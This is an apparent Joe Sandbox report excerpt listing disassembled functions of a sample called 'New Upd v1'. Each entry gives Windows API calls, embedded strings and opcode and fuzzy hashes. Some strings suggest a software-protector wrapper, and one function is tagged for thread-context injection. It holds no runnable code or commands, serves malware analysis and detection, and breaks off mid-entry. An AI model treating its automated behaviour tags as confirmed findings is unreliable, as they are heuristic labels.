__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0080114F
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008011AF
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008011C4

Memory Dump Source

Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$Time$FileSystem
String ID:
API String ID: 2644170505-0
Opcode ID: 1194a3a8c28169ec708184c3bd52bc0c842b6905e528733fd0b9db92a219fbb0
Instruction ID: addf733738c548173a65405ce0b532355d20bb4d019687bd20cfbca0b0e1c1c1
Opcode Fuzzy Hash: 1194a3a8c28169ec708184c3bd52bc0c842b6905e528733fd0b9db92a219fbb0
Instruction Fuzzy Hash: 5051C5B4E006589BCB64CF98DC85BEEBBB5FB89310F108599E519A7390D735AA80CF50

Function 0080E230 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: c1df472a9c6741918bde814ac0d856a284ee7a90a3433338481c7132581bb492
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: A3112B7724208183D6D48A7DDDB46B7A79EFFC532172C4B7AF181CBBD8D222E9459500

Function 007EC070 Relevance: 42.2, APIs: 28, Instructions: 232
windowmemorysleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 007EC500: GetModuleHandleA.KERNEL32(00000000), ref: 007EC53B
Part of subcall function 007EC500: LoadCursorA.USER32(00000000,00007F00), ref: 007EC552
Part of subcall function 007EC500: RegisterClassW.USER32(0000000B), ref: 007EC573
Part of subcall function 007EC500: GetModuleHandleA.KERNEL32(00000000,00000000), ref: 007EC57D
Part of subcall function 007EC500: CreateWindowExW.USER32(00040300,0083BA74,DDE Processing,02CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000), ref: 007EC5AF

GetTickCount.KERNEL32 ref: 007EC09F
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 007EC0C6
TranslateMessage.USER32(?), ref: 007EC0D4
DispatchMessageA.USER32(?), ref: 007EC0DE
GetTickCount.KERNEL32 ref: 007EC0FE
GetTickCount.KERNEL32 ref: 007EC115
EnumWindows.USER32(007EC400,00000000), ref: 007EC12E
IsWindow.USER32(00000000), ref: 007EC140
Sleep.KERNEL32(00000001), ref: 007EC393

Part of subcall function 007ECDB0: _memset.LIBCMT ref: 007ECDDE

Part of subcall function 007ECE30: _memset.LIBCMT ref: 007ECE5E

Part of subcall function 007EBC70: GetVersionExA.KERNEL32(00000094), ref: 007EBC9F

IsWindowUnicode.USER32(00000000), ref: 007EC1A3
GlobalAlloc.KERNEL32(00002002,?), ref: 007EC1C8
GlobalLock.KERNEL32(?), ref: 007EC1D5
_wcscpy.LIBCMT ref: 007EC1EB
GlobalUnlock.KERNEL32(?), ref: 007EC1F7
PackDDElParam.USER32(000003E8,00000000,?), ref: 007EC208
PostMessageW.USER32(00000000,000003E8,00000000,00000000), ref: 007EC220
_strlen.LIBCMT ref: 007EC253
GlobalAlloc.KERNEL32(00002002,-00000001), ref: 007EC264
GlobalLock.KERNEL32(?), ref: 007EC271
GlobalUnlock.KERNEL32(?), ref: 007EC293
PackDDElParam.USER32(000003E8,00000000,?), ref: 007EC2A4
PostMessageA.USER32(00000000,000003E8,00000000,00000000), ref: 007EC2BC
_strlen.LIBCMT ref: 007EC2F4
GlobalAlloc.KERNEL32(00002002,-00000001), ref: 007EC305
GlobalLock.KERNEL32(?), ref: 007EC312
GlobalUnlock.KERNEL32(?), ref: 007EC334
PackDDElParam.USER32(000003E8,00000000,?), ref: 007EC345
PostMessageA.USER32(00000000,000003E8,00000000,00000000), ref: 007EC35D

Part of subcall function 007EBF40: EnterCriticalSection.KERNEL32(?), ref: 007EBF50
Part of subcall function 007EBF40: _wcsncpy.LIBCMT ref: 007EBFAA
Part of subcall function 007EBF40: codecvt.LIBCPMTD ref: 007EBFD6
Part of subcall function 007EBF40: LeaveCriticalSection.KERNEL32(?), ref: 007EBFF2

Memory Dump Source

Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd

Similarity

API ID: Global$Message$AllocCountLockPackParamPostTickUnlockWindow$CriticalHandleModuleSection_memset_strlen$ClassCreateCursorDispatchEnterEnumLeaveLoadPeekRegisterSleepTranslateUnicodeVersionWindows_wcscpy_wcsncpycodecvt
String ID:
API String ID: 1423932449-0
Opcode ID: 87506c53d0a50df46a967a8bf45bb915cd354bec8ecdbcc7c488871017bd43bd
Instruction ID: 92f92c2bfa6e7a9e9130f554b5af018f02914e53e5a52347b561f7c590bb38f2
Opcode Fuzzy Hash: 87506c53d0a50df46a967a8bf45bb915cd354bec8ecdbcc7c488871017bd43bd
Instruction Fuzzy Hash: 7181C0B9902244EBDB09EBE5DC89FAE7B78FB4C700F004518F515E62D1DBB89905CB62

Function 007F32B0 Relevance: 31.8, APIs: 5, Strings: 13, Instructions: 324
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,A407B194), ref: 007F32D7

Part of subcall function 00805A70: GetModuleHandleA.KERNEL32(00000000), ref: 00805A8B
Part of subcall function 00805A70: _memset.LIBCMT ref: 00805AAD
Part of subcall function 00805A70: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00805AC5
Part of subcall function 00805A70: _strrchr.LIBCMT ref: 00805AD4
Part of subcall function 00805A70: _strrchr.LIBCMT ref: 00805AF7
Part of subcall function 00805A70: _sprintf.LIBCMT ref: 00805B37

_memset.LIBCMT ref: 007F3337

Part of subcall function 007F3720: _strncpy.LIBCMT ref: 007F3777

_strlen.LIBCMT ref: 007F339B
_strlen.LIBCMT ref: 007F3696
MessageBoxA.USER32(00000000,?,00000000,00040010), ref: 007F36D8

Strings

HWCHANGELOG, xrefs: 007F35F1
QUIETREGISTER, xrefs: 007F34BD
REGISTER, xrefs: 007F3482
ARMDEBUG=, xrefs: 007F3641
SERVER, xrefs: 007F3367
FIXCLOCK, xrefs: 007F3522
DOWN, xrefs: 007F33DF
INFO, xrefs: 007F354C
TRANSFER, xrefs: 007F34F8
QUIETUNREGISTER, xrefs: 007F35A0
UNREGISTER, xrefs: 007F3576
SHOWNETUSERS, xrefs: 007F35CA
QUIETEXIT, xrefs: 007F3618

Memory Dump Source

Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd

Similarity

API ID: Module$Handle_memset_strlen_strrchr$FileMessageName_sprintf_strncpy
String ID: ARMDEBUG=$DOWN$FIXCLOCK$HWCHANGELOG$INFO$QUIETEXIT$QUIETREGISTER$QUIETUNREGISTER$REGISTER$SERVER$SHOWNETUSERS$TRANSFER$UNREGISTER
API String ID: 1944943824-1461945346
Opcode ID: ceb53c1f2e383db1865a1841a5fc5bd8127eab9c924fc304b49a139391101bed
Instruction ID: c5209f92dd034238ca555038c5e2122246f77720475bedd18218c7b69aa3c0d1
Opcode Fuzzy Hash: ceb53c1f2e383db1865a1841a5fc5bd8127eab9c924fc304b49a139391101bed
Instruction Fuzzy Hash: 3BC18DF5E04249DBDB04DFA8DD81ABEB7B4FF44704F104119E905AB381E7799A14CBA2

Function 007FA390 Relevance: 21.2, APIs: 14, Instructions: 206
sleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 007FA3CD
SetThreadPriority.KERNEL32(00000000), ref: 007FA3D4

Part of subcall function 007FA6D0: GetExitCodeProcess.KERNEL32(?,008475B8), ref: 007FA6DC

WaitForInputIdle.USER32(?,000001F4), ref: 007FA3FC
Sleep.KERNEL32(000000FA), ref: 007FA410
WaitForInputIdle.USER32(?,00007530), ref: 007FA443
Sleep.KERNEL32(000001F4), ref: 007FA44E
GetTickCount.KERNEL32 ref: 007FA460
_memset.LIBCMT ref: 007FA54C
GetModuleHandleA.KERNEL32(00000000,?,0000000A,00000000), ref: 007FA560
GetModuleHandleA.KERNEL32(00000000,00000000,?), ref: 007FA5A0

Memory Dump Source

Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd

Similarity

API ID: HandleIdleInputModuleSleepThreadWait$CodeCountCurrentExitPriorityProcessTick_memset
String ID:
API String ID: 3765605693-0
Opcode ID: 89245f2ba8aa272d2f546901440f7f4dee47a6f8916700a55bd5b4494d66de3c
Instruction ID: 1cfc03036ba6805537f42530d8e82f33d49e934ac8d71529cbc19b57b9a2ff86
Opcode Fuzzy Hash: 89245f2ba8aa272d2f546901440f7f4dee47a6f8916700a55bd5b4494d66de3c
Instruction Fuzzy Hash: 76819EB1D04258EBDB24DF64DC5ABFEB774FF44300F1445A8E60AA6281EBB86A44CF51

Function 007EC400 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 69
windowthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowThreadProcessId.USER32(?,?), ref: 007EC40E

Part of subcall function 007EBC70: GetVersionExA.KERNEL32(00000094), ref: 007EBC9F

GlobalAddAtomW.KERNEL32(00846B84), ref: 007EC443
GlobalAddAtomW.KERNEL32(System), ref: 007EC452
SendMessageW.USER32(?,000003E0,00000000,00000000), ref: 007EC48B
GlobalAddAtomA.KERNEL32(0084697C), ref: 007EC498
GlobalAddAtomA.KERNEL32(System), ref: 007EC4A7
SendMessageA.USER32(?,000003E0,00000000,00000000), ref: 007EC4E0

Strings

System, xrefs: 007EC4A2
System, xrefs: 007EC44D

Memory Dump Source

Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd

Similarity

API ID: AtomGlobal$MessageSend$ProcessThreadVersionWindow
String ID: System$System
API String ID: 3220657938-2206101080
Opcode ID: 6f65edbfa7a7676e9af29873a0e40fe9525a1573b329423d4e6ad7669ed95b42
Instruction ID: 276d932580bb3a02d4c7ad8e6d1f2379ba31daf87bc9cf70e9f67a240dce3fae
Opcode Fuzzy Hash: 6f65edbfa7a7676e9af29873a0e40fe9525a1573b329423d4e6ad7669ed95b42
Instruction Fuzzy Hash: 9F2100385012A9EBD714DFA5D8549BE7F75FF89301F008424F842CA2D0D3BC8940DB61

Function 00814022 Relevance: 10.7, APIs: 7, Instructions: 157
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getSystemCP.LIBCMT ref: 0081403B

Part of subcall function 00813FA8: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00813FB5
Part of subcall function 00813FA8: GetOEMCP.KERNEL32(00000000), ref: 00813FCF

setSBCS.LIBCMT ref: 0081404D

Part of subcall function 00813D25: _memset.LIBCMT ref: 00813D38

IsValidCodePage.KERNEL32(-00000030), ref: 00814093
GetCPInfo.KERNEL32(00000000,?), ref: 008140A6
_memset.LIBCMT ref: 008140BE
setSBUpLow.LIBCMT ref: 00814191

Memory Dump Source

Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd

Similarity

API ID: Locale_memset$CodeInfoPageSystemUpdateUpdate::_Valid
String ID:
API String ID: 2658552758-0
Opcode ID: 252f4f5e881f79168b0602d29eed467c25c90aa4ca32ac7f38733c29fe212f97
Instruction ID: 67e817c1eacfded6075ed443f06bc880645e1272c2a681e42cee45694bd1d914
Opcode Fuzzy Hash: 252f4f5e881f79168b0602d29eed467c25c90aa4ca32ac7f38733c29fe212f97
Instruction Fuzzy Hash: 15511471900219ABCF158F69C8806FEBBB8FF55304F14906AD886EF242D67889C2CB91

Function 007F93C0 Relevance: 10.6, APIs: 7, Instructions: 64
timewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 007F8CB0: GetTickCount.KERNEL32 ref: 007F8D41
Part of subcall function 007F8CB0: CreateThread.KERNEL32(00000000,00000000,007F93C0,00000000,00000000,0084739C), ref: 007F8D64
Part of subcall function 007F8CB0: CloseHandle.KERNEL32(00000000), ref: 007F8D6B
Part of subcall function 007F8CB0: GetTickCount.KERNEL32 ref: 007F8D7C
Part of subcall function 007F8CB0: Sleep.KERNEL32(00000001), ref: 007F8D8C

GetTickCount.KERNEL32 ref: 007F9403
SetTimer.USER32(00000000,00000001,000000FA,00000000), ref: 007F9429
IsWindow.USER32(00000000), ref: 007F9433
PeekMessageA.USER32(?,00000000,00000000,00000000,00000003), ref: 007F944B

Memory Dump Source

Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd

Similarity

API ID: CountTick$CloseCreateHandleMessagePeekSleepThreadTimerWindow
String ID:
API String ID: 3369590426-0
Opcode ID: ab18d9bda72e5a07cad87f1cfc4b10e63204dc84d4420692d0a0e384ebeae15a
Instruction ID: bcad65188fa0a02070999f7c617e324aa683b51ea9c9054e53fd2bf1a3071840
Opcode Fuzzy Hash: ab18d9bda72e5a07cad87f1cfc4b10e63204dc84d4420692d0a0e384ebeae15a
Instruction Fuzzy Hash: 81219AB1A14248ABDF14DFA0EC49FBB77B8BB58700F104918FB56E6390D7B89441DB61

Function 007FF4E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(COMCTL32.DLL,?,?,?,?,?,?,?,00000000,007F25CE,00000000), ref: 007FF4EB
GetProcAddress.KERNEL32(00000000,_TrackMouseEvent), ref: 007FF503
GetDesktopWindow.USER32 ref: 007FF520

Strings

COMCTL32.DLL, xrefs: 007FF4E6
_TrackMouseEvent, xrefs: 007FF4FA

Memory Dump Source

Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd

Similarity

API ID: AddressDesktopLibraryLoadProcWindow
String ID: COMCTL32.DLL$_TrackMouseEvent
API String ID: 3665478104-1888676618
Opcode ID: 189bfe74c16089025db40e2958dc4be473a35d2148c2771a8c8351e11f6784bd
Instruction ID: 5bbec7754704c7219e6751716e096b43bf2c0a5a4c236c25abe91a43ac4cb49f
Opcode Fuzzy Hash: 189bfe74c16089025db40e2958dc4be473a35d2148c2771a8c8351e11f6784bd
Instruction Fuzzy Hash: 3CF0B774C01208EBCB04EFE8D9197AEBB74FB14315F1046A8D962A3290D7B94695DB91

Function 007FF360 Relevance: 7.6, APIs: 5, Instructions: 50threadsleepinjectionCOMMON

Download Yara Rule

APIs

Part of subcall function 007FA6D0: GetExitCodeProcess.KERNEL32(?,008475B8), ref: 007FA6DC

ResumeThread.KERNEL32(?), ref: 007FF38F
Sleep.KERNEL32(00000064), ref: 007FF397
SuspendThread.KERNEL32(?), ref: 007FF3A4
_memset.LIBCMT ref: 007FF3B8
GetThreadContext.KERNEL32(?,00010001), ref: 007FF3D8

Memory Dump Source

Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd

Similarity

API ID: Thread$CodeContextExitProcessResumeSleepSuspend_memset
String ID:
API String ID: 1781661147-0
Opcode ID: 829708fc911f4993b926b08ff23e950ea740bb4bd57a57c363a0af0572e1f727
Instruction ID: a0a6ea4dc3feac34afa0a0c6d285296e7f42bad7ed3192555ee747e392cb9edc
Opcode Fuzzy Hash: 829708fc911f4993b926b08ff23e950ea740bb4bd57a57c363a0af0572e1f727
Instruction Fuzzy Hash: 9011C271A00208AFCB18EF64D888EAD7775FF88300F008154FA4A9B391DF74E940CB92

Function 007EC010 Relevance: 7.5, APIs: 5, Instructions: 33sleepthreadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,007EC070,00000000,00000000,?), ref: 007EC027
CloseHandle.KERNEL32(?), ref: 007EC034
IsWindow.USER32(00000000), ref: 007EC047
Sleep.KERNEL32(00000001), ref: 007EC053
Sleep.KERNEL32(00000064), ref: 007EC05D

Memory Dump Source

Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd

Similarity

API ID: Sleep$CloseCreateHandleThreadWindow
String ID:
API String ID: 3655506807-0
Opcode ID: 08d4a349b378876cd2784f22441589663c15c5f23e430659d4e43ae225fc0e87
Instruction ID: 8e3f3b41163ef90d7219e154b83e5a7fd31986a96b06c08e7f7e55c5e088d836
Opcode Fuzzy Hash: 08d4a349b378876cd2784f22441589663c15c5f23e430659d4e43ae225fc0e87
Instruction Fuzzy Hash: 0DF0E238645304FBDB209FA1DC0EBAE7774B789B01F104484F601A61C0D6F9AA42DB61

Function 007F3010 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32(00000110,008470F8), ref: 007F3037
GetDlgItem.USER32(00000110,000003EA), ref: 007F304A
SetWindowTextA.USER32(00000000), ref: 007F3051

Strings

Loading..., xrefs: 007F3016

Memory Dump Source

Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd

Similarity

API ID: TextWindow$Item
String ID: Loading...
API String ID: 1634842743-3445898995
Opcode ID: 5906dc445cf9db498859a6a3d7e06ace8756b8cfeeaccafda5536444daaf6db5
Instruction ID: c2fc32c443de50418ba4164fedacf4e44582cf6b019e6625c3e6b2ae855889ef
Opcode Fuzzy Hash: 5906dc445cf9db498859a6a3d7e06ace8756b8cfeeaccafda5536444daaf6db5
Instruction Fuzzy Hash: DCF0823450050CFBCB00DFB4D8488AE7BB9EB48300F108916FA52A7280C7B49A40CB90

Function 007F12C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 174COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007F1401
GetEnvironmentVariableA.KERNEL32(ARMSPLASHOFF,?,00000100), ref: 007F141A

Part of subcall function 007F2F80: ShowWindow.USER32(00000000,00000005), ref: 007F2FEE
Part of subcall function 007F2F80: UpdateWindow.USER32(00000000), ref: 007F2FF8

Strings

ARMSPLASHOFF, xrefs: 007F1415

Memory Dump Source

Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
